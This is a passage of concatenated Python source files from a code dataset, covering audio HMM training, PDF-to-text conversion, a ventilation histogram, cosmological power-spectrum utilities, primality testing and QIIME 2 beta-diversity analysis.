is 2048\n#BLOCK_SIZE=2048 #if is too small it print 0\naudio_queue = queue.Queue()\n\ndef capture_audio(block, block_len, time, status):\n\n audio_queue.put(block.copy())\n #print(block_len)\n\n\n# Function to parse input arguments\ndef build_arg_parser():\n parser = 
argparse.ArgumentParser(description='Trains the HMM classifier')\n #./name/\n parser.add_argument(\"-i\",\"--input-audiodirectory\", dest=\"input_folder\", required=True,\n help=\"Input folder containing the audio files in subfolders\")\n parser.add_argument(\"-o\",\"--model\",dest=\"model\",required=False,\n help=\"HMM Model Filename\") \n return parser\n\n#if __name__=='__main__':\n@profile(precision=3)\ndef main():\n args = build_arg_parser().parse_args()\n input_folder = args.input_folder\n\n hmm_models = []\n\n # Training Folder\n for dirname in os.listdir(input_folder) :\n if os.path.isdir(input_folder+dirname)==True:\n # SubFolder full path \n subfolder = os.path.join(input_folder, dirname)\n # Extract the label\n label = dirname\n # Initialize Variables\n all_mfcc_features = np.array([])\n labels = []\n cnt=0\n for i,audio in enumerate(sorted(os.listdir(subfolder))):\n \n if audio[-3:] == 'wav'or 'mp3':\n # Read the input file\n filepath = os.path.join(subfolder,audio)\n #print(audio[-3:])\n sampling_freq, data = wavfile.read(filepath)\n\n # Extract MFCC features in 1 audio, default nfft=512, \n #AppendEnergy - replace the 0th MFCC to the log(total frame Energy)\n mfcc_features = mfcc(data, sampling_freq,appendEnergy=True)\n #print(mfcc_features.shape)\n \n # Extract MFCC features in all audios (2D array)\n if all_mfcc_features.size == 0:\n all_mfcc_features = mfcc_features[:,1:]\n #print(all_mfcc_features.shape)\n else:\n all_mfcc_features = np.append(all_mfcc_features, mfcc_features[:,1:], axis=0)\n cnt=i\n # Append the label\n labels.append(label)\n else:\n raise Exception(\"Not an audio file\")\n #print(i)\n print(label, \"File Count:\",cnt+1)\n print ('all_mfcc_features.shape =', all_mfcc_features.shape)\n # Train and save HMM model\n hmm_trainer = HMM.TrainHMM()\n hmm_trainer.train(all_mfcc_features)\n hmm_models.append((hmm_trainer, label))\n \n hmm_trainer = None\n else:\n raise Exception(\"Training Subfolder doesn't exist\")\n \n if 
args.model.endswith(\".joblib\")==True:\n dump(hmm_models,args.model)\n else:\n dump(hmm_models,args.model+\".joblib\")\n\n \n \n input_files=[]\n\n for x in os.listdir(test_folder):\n input_files.append(test_folder+x)\n \n # Classify input data\n for input_file in input_files:\n # Read input file\n sampling_freq, audio = wavfile.read(input_file)\n #print('Wav Audio',audio.shape)\n # Extract MFCC features\n mfcc_features = mfcc(audio, sampling_freq,appendEnergy=True)\n print(mfcc_features[:,1:].shape)\n # Define variables\n max_score = -100000\n output_label = None\n\n # Iterate through all HMM models and pick \n # the one with the highest score\n for item in hmm_models:\n hmm_model, label = item\n score = hmm_model.hmm_score(mfcc_features[:,1:])\n print(score)\n if score > max_score:\n max_score = score\n output_label = label\n\n # Print the output\n print (\"True:\", input_file[input_file.find('\\\\')+1:input_file.rfind('\\\\')])\n print (\"Predicted:\", output_label) \n #print(psutil.virtual_memory())\n\nif __name__=='__main__':\n main()","sub_path":"2_traincoughHMM.py","file_name":"2_traincoughHMM.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"522021652","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 3 14:53:49 2018\n\n@author: j2\n\nchange DoD pdf to txt - do for 2011\nchange to pypdf2\n\n\"\"\"\nimport PyPDF2\nfrom bs4 import BeautifulSoup\nimport nltk\nimport re\n\npdf_file = open('DOD2011.pdf','rb')\nfout = open('DOD2011.txt','wt')\nread_pdf = PyPDF2.PdfFileReader(pdf_file)\nsoup = BeautifulSoup(\"\", \"lxml\")\n# regex of printable characters\n\nnum_pages = read_pdf.getNumPages()\npages=[]\n\nraw_text = \"\"\ntt = \"\"\ntext=\"\"\n\n\nfor i in range(0,num_pages):\n page = read_pdf.getPage(i)\n pages.append(page)\n \nfor i in range(len(pages)):\n # print(pages[i].extractText())\n t = pages[i].extractText()\n soup = 
BeautifulSoup(t)\n text_parts = soup.findAll(text=True)\n text = ' '.join(text_parts)\n for j in range(len(text)):\n if text[j].isprintable():\n tt = tt+text[j]\n \n raw_text = raw_text + tt + ' '\n\nfout.write(raw_text)\n\nfout.close()\npdf_file.close()\n\n \n\n\n\n\n","sub_path":"DoDconvert2.py","file_name":"DoDconvert2.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"552215916","text":"import pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndf = pd.read_excel('C:\\\\Users\\\\ird8185\\\\Downloads\\\\Vent Detail.xlsx',\n skiprows=[0, 1]) # import Sepsis Patient Detail from Microstrategy and skips first two rows\ndf=df[(df['Actual/Billed Indicator']=='Actual')]\n\ntimegroup=df.reindex(columns=['Actual Vent Start Date/Time'])\ntimegroup = timegroup.groupby(by=[df['Actual Vent Start Date/Time'].map(lambda x : (x.hour))],as_index=False).count()\ntimegroup = timegroup.reset_index()\n\nplt.bar(timegroup['index'],timegroup['Actual Vent Start Date/Time'],color='dodgerblue', edgecolor='black', align='center')\nplt.title('Vent Start Histogram')\nplt.ylabel('# Cases (Six Months Meditech)')\nplt.xlabel('Hour of Day')\n\nplt.show()\n\nprint (timegroup)\n","sub_path":"Vent Histogram.py","file_name":"Vent Histogram.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"602919559","text":"#!/usr/bin/python\nfrom __future__ import print_function\nimport os\nimport sys\nfrom numpy import *\nimport struct\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nfrom scipy import integrate\nimport itertools\nimport params_power as par\n\nshot = 0\n\n########## Powerfile Finder function ##########\n\ndef finder (in_dir,base,flag,ptype=None):\n \"Finds the powerfiles to read, both for camb and p-power files.\"\n\n # internal 
variables\n\n z = []\n if flag=='camb':\n end=\".dat\"\n elif flag=='gev':\n end=\"deltaN.dat\"\n else:\n end=\".txt\"\n \n # function\n \n a = os.listdir (in_dir)\n a = compress(list(x.startswith(base) and x.endswith(end) for x in a),a)\n\n if ptype != None:\n a = compress(list( 'type'+str(ptype) in x for x in a),a)\n\n if flag=='camb':\n a = compress(list('matterpower' in x for x in a),a)\n \n if flag=='camb':\n z=list(float(x[x.index('z')+1:-4]) for x in a)\n elif flag=='gev':\n for x in a:\n f=open(in_dir+x,'r')\n line=f.readline() #discard first line\n line=f.readline()\n f.close()\n if 'redshift' in line:\n z.append(round(float(line[line.index('=')+1:]),1))\n else:\n print('Second line in gev_powerfile is not the redshift one, check it!')\n exit() \n else:\n for x in a:\n f=open(in_dir+x,'r')\n z.append(round(1/float(f.readline().strip())-1,2))\n f.close()\n\n a = [x for (y,x) in sorted(zip(z,a),reverse=True)]\n z = sorted(z,reverse=True)\n\n\n if len(a)==0:\n for d in os.listdir(in_dir):\n if os.path.isdir(in_dir+d):\n d = d + '/'\n b,w = finder(in_dir+d,base,flag,False)\n z = z + w\n a = a + [d+e for e in b]\n \n if len(a)==0:\n return [],[]\n\n if sys.flags.debug:\n print (\"\\nIn\",in_dir,)\n print (\"I found\",len(a),flag,\"power files\")\n print (\"with redshifts: \",z)\n \n return a,z\n\n########### Redshift check ##########\n\ndef z_check (p_i,z_i,p_j,z_j):\n \"Checks wheter there are compatible redshifts or not. 
In case, selects the ones that match.\"\n\n # internal variables\n\n tolerance=0.01\n z_ij=[]\n p_i_temp=[]\n p_j_temp=[]\n \n # function\n \n for i in z_i:\n for j in z_j:\n if abs(i-j)<=tolerance and round((i+j)/2.,2) not in z_ij and round((i+j)/2.,2) not in par.skip_z:\n z_ij.append(round((i+j)/2.,2))\n p_i_temp.append(p_i[z_i.index(i)])\n p_j_temp.append(p_j[z_j.index(j)])\n \n p_i=p_i_temp\n p_j=p_j_temp\n \n if len(z_ij) > 0:\n \n if len(z_ij)dlogk and count[istart:i+1].sum()>mincount:\n s_arr.k[i+1] = average(k[istart:i+1],weights=count[istart:i+1])\n s_arr.Pk[i+1] = average(Pk[istart:i+1],weights=count[istart:i+1])\n s_arr.count[i+1] = count[istart:i+1].sum()\n \n istart=i+1\n BU.append(i)\n\n else:\n\n for i in BI:\n \n s_arr.k[i+1] = average(k[istart:i+1],weights=count[istart:i+1])\n s_arr.Pk[i+1] = average(Pk[istart:i+1],weights=count[istart:i+1])\n s_arr.count[i+1] = count[istart:i+1].sum()\n \n istart=i+1\n BU.append(i)\n \n s_arr=s_arr[~(s_arr.Pk==0)]\n \n #print(BI)\n #print(BU)\n\n return s_arr, BU\n\n########## Powerfile Reader function ##########\n\ndef gadget_reader(in_dir,powerfile,flag,BI):\n \"Reads the standard format of p-power file, for G2 or G3\"\n\n # internal variables\n\n global shot\n \n databin1=[]\n databin2=[]\n databin=[]\n databintot=[]\n\n # function\n \n f=open(in_dir+powerfile,'r')\n lines=f.readlines()\n f.close()\n\n redshift_string=str(round(1/float(lines[0])-1,2))\n lines.pop(0)\n NumBins=int(lines[0])\n lines.pop(0)\n\n if flag=='G3':\n dummy=lines[0]\n lines.pop(0)\n dummy=lines[0]\n lines.pop(0)\n\n data1=array([u.split() for u in lines[:NumBins]]).astype('float')\n data2=array([u.split() for u in lines[NumBins+2*(1+int(flag=='G3')):]]).astype('float')\n\n data1 = data1[~(data1[:,1] == 0)]\n data2 = data2[~(data2[:,1] == 0)]\n \n data1[:,0:2] = array([converter(flag,0) (x,y) for (x,y) in data1[:,0:2] ])\n data2[:,0:2] = array([converter(flag,0) (x,y) for (x,y) in data2[:,0:2] ])\n \n print ('\\nReading',powerfile,'of Z 
=',redshift_string)\n \n ## the file format is:\n ## 4 lines with Time, Tot#K and two dummy (only > Gadget2) variables respectively\n ## Tot#K lines with K,D**2,Shot,ModePow,ModeCount,D**2Raw,ModePowRaw,SpecShape,SumPow,ConvFactor\n ## this repeated two times, one for the top_layer and one for the bottom_layer\n\n\n data=vstack((data1,data2))\n \n data=data[argsort(data[:,0])]\n \n shot=interpolate.interp1d(data[:,0],data[:,2],bounds_error=False,fill_value=-100)\n\n # this to make sure that strange features come up again at high k in the PS once the are below the shot\n # sometimes happens at very homogeneous states\n if par.power_cut_shot==True:\n for i in range(shape(data)[0]):\n if data[i,1] < 0.5 * data[i,2]:\n data=data[:i]\n break\n \n databin, BI = binning(data[:,0],data[:,1],data[:,4],BI)\n\n databin.Pk=smooth(databin.Pk,par.databin_smoothing)\n\n if par.power_cut_shot==True:\n databin = databin[(databin.Pk >= shot(databin.k))]\n\n print (\"Number of bins in the joint layer: \",shape(databin)[0])\n \n \n '''\n shot_1=interpolate.interp1d(data1[:,0],data1[:,2],bounds_error=False,fill_value=-100)\n shot_2=interpolate.interp1d(data2[:,0],data2[:,2],bounds_error=False,fill_value=-100)\n \n # Bottom Layer Binning\n\n if len(data1)>0:\n databin1=binning(data1[:,0],data1[:,1],data1[:,4])\n\n if par.power_cut_shot==True:\n databin1 = databin1[(databin1.Pk >= shot_1(databin1.k))]\n\n # Top Layer Binning\n\n if len(data2)>0:\n databin2=binning(data2[:,0],data2[:,1],data2[:,4])\n\n if par.power_cut_shot==True:\n databin2 = databin2[(databin2.Pk >= shot_2(databin2.k))]\n \n # Cut & Paste of the two binned sets\n\n if len(data1)*len(data2)!=0:\n databin=concatenate((databin2,databin1[(databin1.k>databin2.k.max())]))\n else:\n if len(data1)==0:\n if len(data2)==0:\n print(\"data1 == data2 == 0\")\n exit()\n databin=databin2\n else:\n databin=databin1 \n\n databin=array(databin,dtype=[('k',float),('Pk',float),('count',int)]).view(recarray)\n\n print (\"Number of bins in 
the upper | bottom | joint layer: \",shape(databin2)[0],shape(databin1)[0],shape(databin)[0])\n\n ''' \n \n # Interpolations\n\n fn=interpolate.interp1d(databin.k,databin.Pk,bounds_error=False,fill_value=-100)\n \n return databin,fn,BI\n\n########### Gevolution Reader ###########\n\ndef gev_reader (in_dir,powerfile,BI):\n \"Reads the powerspectrum file from Gevolution\"\n\n print ('\\n','Reading ',powerfile)\n \n f=open(in_dir+powerfile,'r')\n lines=f.readlines()\n f.close()\n \n P=array(zeros(len(lines)-3),dtype=[('k',float),('Pk',float),('count',int)]).view(recarray)\n err=zeros(len(lines)-3)\n \n for u in lines:\n \n if lines.index(u)<=2:\n if 'redshift' in u:\n redshift_string=str(round(float(u[u.index('=')+1:]),1))\n continue\n \n P.k[lines.index(u)-3] =u.split()[0]\n P.Pk[lines.index(u)-3] =u.split()[1]\n err[lines.index(u)-3] =u.split()[3]\n P.count[lines.index(u)-3]=u.split()[4]\n\n print (\"This is the power file at redshift: \"+redshift_string)\n \n P.k=P.k#*par.Units_conversion_factor\n P.Pk=(2*pi*pi*P.Pk)/(P.k**3)*(10)#*((0.8159)/(1.05023189e-2))**2 # A MANOOOOOOOO\n\n P, BI =binning(P.k,P.Pk,P.count,BI)\n\n print( \"Number of bins in the gev binned spectrum: \",len(P))\n\n fn=interpolate.interp1d(P.k,P.Pk,bounds_error=False,fill_value=-100)\n\n return P,fn\n\n########### Camb reader ##########\n\ndef camb_reader (in_dir,powerfile,BI):\n \"Reads the standard camb file\"\n\n # internal variables\n \n redshift_string=powerfile[powerfile.index('z')+1:-4]\n\n # function\n\n print ('\\n','Reading ',powerfile)\n print (\"This is the power file at redshift: \"+redshift_string)\n \n f=open(in_dir+powerfile,'r')\n lines=f.readlines()\n f.close()\n\n s_arr=array(zeros(len(lines)),dtype=[('k',float),('Pk',float),('count',int)]).view(recarray)\n \n for u in lines:\n if '#' in u:\n continue\n s_arr.k[lines.index(u)] = float(u.split()[0]) #/ ((float(redshift_string)+1)/(1101))**0.25\n s_arr.Pk[lines.index(u)]= float(u.split()[1]) #* 
(float(redshift_string)+1)**0.75\n\n print( \"Number of points in the camb spectrum: \",len(s_arr))\n \n fn=interpolate.interp1d(s_arr.k,s_arr.Pk,bounds_error=False,fill_value=-100)\n\n return s_arr,fn\n\n########### Sigma 8 calculator ###########\n\ndef sigma8(data):\n \"Compute sigma8 for an array of k,Pk in Mpc lenght units\"\n \n R=8.0 # R is the window radius, for sigma8 is R = 8 Mpc \n\n fn_s8=interpolate.interp1d(data[:,0],data[:,1],bounds_error=False)\n \n def integ(k):\n Pk = fn_s8(k)\n if k*R < 1.0e-8:\n return 0.\n else:\n return 36. * pi * Pk / (k**2 * R**4) * ( sin(k*R)/(k*R) - cos(k*R) )**2\n \n s8=sqrt(integrate.romberg(integ,0,data[-1,0],show=False,divmax=12))\n \n return s8\n\n########## Power file converter ##########\n\ndef converter(flag,mode):\n \"Return a lambda function that map flag-type-file data into k[Mpc^-1],Pk[Mpc^3]. The direction of the mapping is given by mode parameter.\"\n\n unit=par.Units_conversion_factor\n \n # Reading data and map into ( k[Mpc^-1], Pk[Mpc^3] )\n if mode==0 or mode=='r':\n if flag=='camb':\n return (lambda x,y : (x,y))\n elif flag=='genic_in':\n return (lambda x,y : (pow(10,x)/unit,pow(10,y-3*x)*2.*pi**2))\n elif flag=='genic_out' or 'G2' or 'G3':\n return (lambda x,y : (x/unit, 2. * pi**2 * y / ((x/unit)**3)))\n #elif flag=='':\n else:\n print(\"%s is not recognized\",flag)\n exit()\n \n # Writing data mapped from ( k[Mpc^-1], Pk[Mpc^3] )\n elif mode==1 or mode=='w':\n if flag=='camb':\n return (lambda x,y : (x,y))\n elif flag=='genic_in':\n return (lambda x,y : (log10(x*unit),3*log10(x*unit) + log10(y)-log10(2.*pi**2)))\n elif flag=='genic_out' or 'G2' or 'G3':\n return (lambda x,y : (x*unit,x**3 * y / 2. 
/ pi**2 ))\n #elif flag=='':\n else:\n print(\"%s is not recognized\",flag)\n exit()\n\n########### Loading powerfile ##########\n\ndef power_load (in_dir,filename,flag,s8norm=-1):\n \"Reads the k,Pk array into a file of flag format\"\n \n f=open(in_dir+filename,'r')\n lines=f.readlines()\n f.close()\n\n n=0\n if (flag=='genic_out'): n=1\n while ('#' in lines[n]):\n n=n+1\n \n data=array([u.split() for u in lines[n:]]).astype('float')\n data=data[:,0:2]\n \n data[:] = array([converter(flag,0) (x,y) for (x,y) in data[:] ])\n\n sigma8_data=sigma8(data)\n \n print('Reading...',filename,'has',shape(data),'lines. Sigma8 found is',sigma8_data)\n\n if s8norm!=-1:\n print('Normalized at',s8norm,'with factor',(s8norm/sigma8_data)**2)\n data[:,1]=data[:,1]*(s8norm/sigma8_data)**2\n sigma8_data=s8norm\n\n if par.plot_check==True:\n if par.plot_delta==False:\n plt.loglog(data[:,0],data[:,1],label=filename)\n else:\n plt.loglog(data[:,0],data[:,1]*power(data[:,0],3)/(2*pi**2),label=filename)\n \n return data,sigma8_data\n\n########### Saving powerfile ###########\n\ndef power_save (in_dir,filename,data,flag):\n \"Writes the k,Pk array into a file of flag format\"\n \n temp=copy(data)\n \n sigma8_data=sigma8(temp)\n \n temp[:] = array([converter(flag,1) (x,y) for (x,y) in temp[:] ])\n\n print('Writing...',filename,'has',shape(temp),'lines. 
Sigma8 original is',sigma8_data)\n\n while (os.path.isfile(in_dir+filename)):\n print(in_dir+filename,'already exists.')\n test = raw_input('Return to overwrite or type a new filename:\\n')\n if not test:\n break\n else:\n filename=test\n \n savetxt(in_dir+filename,temp)\n\n del temp\n \n return filename\n\n########### Plotting databins ##########\n\ndef plot_databins(col,labelname,*db):\n \"Plots the powerspectrum of one or two databins\"\n\n # internal variables\n\n ax=plt.gca()\n\n #function\n\n if par.plot_delta==True:\n db[0].Pk = db[0].Pk * power(db[0].k,3)/(2*pi**2)\n if len(db)==2:\n db[1].Pk = db[1].Pk * power(db[1].k,3)/(2*pi**2)\n \n if len(db)==2:\n ax.plot(log10(db[0].k),log10(db[0].Pk),ls='solid',label=labelname,c=col)\n ax.plot(log10(db[1].k),log10(db[1].Pk),ls='--',c=col)\n\n if len(db)==1:\n ax.plot(log10(db[0].k),log10(db[0].Pk),ls='solid',label=labelname,c=col)\n\n if par.plot_shot==True:\n ax.plot(log10(db[0].k),log10(shot(db[0].k)),ls='solid',c='k')\n \n if par.adaptive_power_axis[0]!=True :\n ax.set_xlim(xmin=par.power_x_ax[0], xmax=par.power_x_ax[1])\n \n if par.adaptive_power_axis[1]!=True :\n ax.set_ylim(ymin=par.power_y_ax[0], ymax=par.power_y_ax[1])\n\n\n if par.plot_diff==False:\n ax.set_xlabel('$log_{10} \\ k \\ [h Mpc^{-1}]$')\n\n ax.legend(loc='best')#,labelspacing=0.2,fontsize='small') \n\n if par.plot_delta==True:\n ax.set_ylabel('$log_{10} \\ \\Delta^2 $')\n else:\n ax.set_ylabel('$\\log_{10} \\ P(k) \\ [Mpc^{-3}]$')\n\n\n########## plot difference functions ########\n\ndef plot_interpolated_difference(db_i,db_j,fn_i,fn_j,col,name_i,name_j,labelname=None):\n \"Plots the difference between two powerspectrum, using the interpolated functions\"\n\n # internal variables\n \n ylabel=r'$P(k)_{'+name_i+'}\\ / \\ P(k)_{'+name_j+'}\\ - \\ 1 \\ [\\%] $'\n if labelname==None:\n labelname=name_i\n if name_j!='':\n labelname=labelname+'/'+name_j\n ylabel=r'$P(k)_{i}\\ / \\ P(k)_{CDM}\\ - \\ 1 \\ [\\%] $'\n \n ax=plt.gca()\n \n # functions\n\n 
top=min(db_i.k.max(),db_j.k.max())\n bottom=max(db_i.k.min(),db_j.k.min())\n u_i=compress(list(x<=top and x>=bottom for x in db_i.k),db_i.k)\n u_j=compress(list(x<=top and x>=bottom for x in db_j.k),db_j.k)\n \n ax.set_xlabel(r'$\\log_{10} \\ k \\ [h Mpc^{-1}]$')\n ax.set_ylabel(ylabel)\n\n if len(u_i)+0.10:\n ax.axhline(+0.10, color='0.75', alpha=0.5, lw=1,ls=':')\n if plt.ylim()[1]>+1.0:\n ax.set_ylim(plt.ylim()[0],+1.0)\n \"\"\"\n if plt.ylim()[0]*plt.ylim()[1]<0.0:\n ax.axhline(0.0, color='0.5', alpha=0.5, lw=1,ls=':')\n\n if par.adaptive_power_axis[0]!=True :\n ax.set_xlim(xmin=par.power_x_ax[0], xmax=par.power_x_ax[1])\n\n if par.adaptive_power_axis[2]!=True :\n ax.set_ylim(ymin=par.power_diff_y_ax[0], ymax=par.power_diff_y_ax[1])\n \n###########\n\ndef reader(in_dir,f,flag,BI=[]):\n \"Function overload between camb or p-power reader\"\n\n if flag=='camb':\n db,fn=camb_reader(in_dir,f,BI)\n elif flag=='G2' or flag=='G3':\n db,fn,BI=gadget_reader(in_dir,f,flag,BI)\n elif flag=='gev':\n db,fn,BI=gev_reader(in_dir,f,BI)\n \n return db,fn,BI\n\ndef smooth(y, box_pts):\n box_pts = min(len(y),box_pts)\n box = ones(box_pts)/box_pts\n y_smooth = convolve(y, box, mode='same')\n return y_smooth\n","sub_path":"functions_power.py","file_name":"functions_power.py","file_ext":"py","file_size_in_byte":18158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526857468","text":"# Probablistic primality testing\n\nfrom ..Algorithms import FastPower\nfrom math import log10, log, floor\nfrom .primes import *\n\ndef FermatTest(a, n):\n '''\n Peforms the Fermat Test to see if Fermat's Little Theorem holds for a^(n-1) = 1 mod n\\n\n Inputs:\n integers a, n\n Output:\n boolean f (false if composite, true if \"probably prime\")\n '''\n f = FastPower(a, n-1, n)\n return f == 1\n\ndef MillerRabin(n, warnings=False):\n '''\n Performs the Miller-Rabin Test on possible prime n\\n\n Input:\n integers n\n boolean warnings (optional, show 
warnings)\n Outputs:\n boolean m (false if composite, true if \"probably prime\")\n '''\n #https://en.wikipedia.org/wiki/Miller%E2%80%93Rabin_primality_test#Accuracy\n \n # If the generalized Riemann hypothesis is true, Miller-Rabin can be made deterministic\n if not n > 1:\n raise Exception('MillerRabin(): n must be strictly greater than 1')\n # Express as n = 2^r*d + 1\n d = n - 1\n r = 0\n while d % 2 == 0:\n r += 1\n d = d // 2\n \n witnessRange = min([n-2, floor(2*(log(n)**2))])\n aIndex = 0\n while smallPrimes[aIndex] < witnessRange:\n x = FastPower(smallPrimes[aIndex], d, n)\n if x == 1 or x == n-1:\n # Failure to find a witness\n aIndex += 1\n if aIndex == len(smallPrimes):\n if warnings:\n print('List of small primes for Miller-Rabin bases has been exhausted for n=' + str(n))\n print('The result is probabalistically determined to be prime.')\n return True\n continue\n failure = False\n for i in range(r - 1):\n x = FastPower(x, 2, n)\n if x == n-1:\n # Failure to find a witness\n aIndex += 1\n if aIndex == len(smallPrimes):\n if warnings:\n print('List of small primes for Miller-Rabin bases has been exhausted for n=' + str(n))\n print('The result is probabalistically determined to be prime.')\n return True\n failure = True\n if not failure:\n return False\n return True\n\ndef IsPrime(n):\n '''\n Determines probabalistically if a number is prime\\n\n Input:\n integer n\n Outputs:\n boolean p (false if composite, true if \"probably prime\")\n '''\n if n % 2 == 0 and n != 2:\n return False\n\n length = log10(n)\n\n if length < 4:\n # Use lookup table\n if n in smallPrimes:\n return True\n else:\n return False\n else:\n return MillerRabin(n)\n\ndef IsSophieGermainPrime(n):\n '''\n Determines whether n is a Sophie Germain prime, that is, it is a prime such that 2n+1 is also prime\\n\n Input:\n integer n\n Output:\n boolean s\n '''\n if not IsPrime(n):\n return False\n if not IsPrime(2*n + 1):\n return False\n return 
True","sub_path":"Primality/Primality.py","file_name":"Primality.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"219757458","text":"# ----------------------------------------------------------------------------\n# Copyright (c) 2016-2018, QIIME 2 development team.\n#\n# Distributed under the terms of the Modified BSD License.\n#\n# The full license is in the file LICENSE, distributed with this software.\n# ----------------------------------------------------------------------------\n\nimport os.path\nimport collections\nimport urllib.parse\nimport pkg_resources\nimport itertools\n\nimport skbio\nimport skbio.diversity\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom statsmodels.sandbox.stats.multicomp import multipletests\nimport qiime2\nimport q2templates\nfrom natsort import natsorted\n\n\nTEMPLATES = pkg_resources.resource_filename('q2_diversity', '_beta')\n\n\ndef bioenv(output_dir: str, distance_matrix: skbio.DistanceMatrix,\n metadata: qiime2.Metadata) -> None:\n # Filter metadata to only include IDs present in the distance matrix.\n # Also ensures every distance matrix ID is present in the metadata.\n metadata = metadata.filter_ids(distance_matrix.ids)\n\n # drop non-numeric columns and empty columns\n pre_filtered_cols = set(metadata.columns)\n metadata = metadata.filter_columns(column_type='numeric')\n non_numeric_cols = pre_filtered_cols - set(metadata.columns)\n\n # filter 0 variance numerical columns and empty columns\n pre_filtered_cols = set(metadata.columns)\n metadata = metadata.filter_columns(drop_zero_variance=True,\n drop_all_missing=True)\n zero_variance_cols = pre_filtered_cols - set(metadata.columns)\n\n # Drop samples that have any missing values.\n # TODO use Metadata API if this type of filtering is supported in the\n # future.\n df = metadata.to_dataframe()\n df = df.dropna(axis='index', how='any')\n\n # 
filter the distance matrix to exclude samples that were dropped from\n # the metadata, and keep track of how many samples survived the filtering\n # so that information can be presented to the user.\n initial_dm_length = distance_matrix.shape[0]\n distance_matrix = distance_matrix.filter(df.index)\n filtered_dm_length = distance_matrix.shape[0]\n\n result = skbio.stats.distance.bioenv(distance_matrix, df)\n result = q2templates.df_to_html(result)\n\n index = os.path.join(TEMPLATES, 'bioenv_assets', 'index.html')\n q2templates.render(index, output_dir, context={\n 'initial_dm_length': initial_dm_length,\n 'filtered_dm_length': filtered_dm_length,\n 'non_numeric_cols': ', '.join(sorted(non_numeric_cols)),\n 'zero_variance_cols': ', '.join(sorted(zero_variance_cols)),\n 'result': result})\n\n\n_beta_group_significance_fns = {'permanova': skbio.stats.distance.permanova,\n 'anosim': skbio.stats.distance.anosim,\n 'permdisp': skbio.stats.distance.permdisp}\n\n\ndef _get_distance_boxplot_data(distance_matrix, group_id, groupings):\n x_ticklabels = []\n all_group_distances = []\n\n # extract the within group distances\n within_group_distances = []\n pairs_summary = []\n group = groupings[group_id]\n for i, sid1 in enumerate(group):\n for sid2 in group[:i]:\n dist = distance_matrix[sid1, sid2]\n within_group_distances.append(dist)\n pairs_summary.append((sid1, sid2, group_id, group_id, dist))\n x_ticklabels.append('%s (n=%d)' %\n (group_id, len(within_group_distances)))\n all_group_distances.append(within_group_distances)\n\n # extract between group distances for group to each other group\n for other_group_id, other_group in groupings.items():\n between_group_distances = []\n if group_id == other_group_id:\n continue\n for sid1 in group:\n for sid2 in other_group:\n dist = distance_matrix[sid1, sid2]\n between_group_distances.append(dist)\n pairs_summary.append(\n (sid1, sid2, group_id, other_group_id, dist))\n x_ticklabels.append('%s (n=%d)' %\n (other_group_id, 
len(between_group_distances)))\n all_group_distances.append(between_group_distances)\n return all_group_distances, x_ticklabels, pairs_summary\n\n\ndef _get_pairwise_group_significance_stats(\n distance_matrix, group1_id, group2_id, groupings, metadata,\n beta_group_significance_fn, permutations):\n group1_group2_samples = groupings[group1_id] + groupings[group2_id]\n metadata = metadata[group1_group2_samples]\n distance_matrix = distance_matrix.filter(group1_group2_samples)\n return beta_group_significance_fn(distance_matrix, metadata,\n permutations=permutations)\n\n\ndef beta_group_significance(output_dir: str,\n distance_matrix: skbio.DistanceMatrix,\n metadata: qiime2.CategoricalMetadataColumn,\n method: str = 'permanova',\n pairwise: bool = False,\n permutations: int = 999) -> None:\n try:\n beta_group_significance_fn = _beta_group_significance_fns[method]\n except KeyError:\n raise ValueError('Unknown group significance method %s. The available '\n 'options are %s.' %\n (method,\n ', '.join(_beta_group_significance_fns)))\n\n # Filter metadata to only include IDs present in the distance matrix.\n # Also ensures every distance matrix ID is present in the metadata.\n metadata = metadata.filter_ids(distance_matrix.ids)\n metadata = metadata.drop_missing_values()\n\n # filter the distance matrix to exclude samples that were dropped from\n # the metadata due to missing values, and keep track of how many samples\n # survived the filtering so that information can be presented to the user.\n initial_dm_length = distance_matrix.shape[0]\n distance_matrix = distance_matrix.filter(metadata.ids)\n filtered_dm_length = distance_matrix.shape[0]\n\n metadata = metadata.to_series()\n\n # Run the significance test\n result = beta_group_significance_fn(distance_matrix, metadata,\n permutations=permutations)\n\n # Generate distance boxplots\n sns.set_style('white')\n # Identify the groups, then compute the within group distances and the\n # between group distances, and 
generate one boxplot per group.\n # groups will be an OrderedDict mapping group id to the sample ids in that\n # group. The order is used both on the x-axis, and in the layout of the\n # boxplots in the visualization.\n # TODO: update to use a grouping API and natsort API on\n # CategoricalMetadataColumn, if those become available.\n groupings = collections.OrderedDict(\n [(id, list(series.index))\n for id, series in natsorted(metadata.groupby(metadata))])\n\n pairs_summary = pd.DataFrame(columns=['SubjectID1', 'SubjectID2', 'Group1',\n 'Group2', 'Distance'])\n for group_id in groupings:\n group_distances, x_ticklabels, group_pairs_summary = \\\n _get_distance_boxplot_data(distance_matrix, group_id, groupings)\n\n group_pairs_summary = pd.DataFrame(\n group_pairs_summary, columns=['SubjectID1', 'SubjectID2',\n 'Group1', 'Group2', 'Distance'])\n\n pairs_summary = pd.concat([pairs_summary, group_pairs_summary])\n\n ax = sns.boxplot(data=group_distances, flierprops={\n 'marker': 'o', 'markeredgecolor': 'black', 'markeredgewidth': 0.5,\n 'alpha': 0.5})\n ax.set_xticklabels(x_ticklabels, rotation=90)\n ax.set_xlabel('Group')\n ax.set_ylabel('Distance')\n ax.set_title('Distances to %s' % group_id)\n # change the color of the boxes to white\n for box in ax.artists:\n box.set_facecolor('white')\n sns.despine()\n plt.tight_layout()\n fig = ax.get_figure()\n fig.savefig(os.path.join(output_dir, '%s-boxplots.png' %\n urllib.parse.quote_plus(str(group_id))))\n fig.savefig(os.path.join(output_dir, '%s-boxplots.pdf' %\n 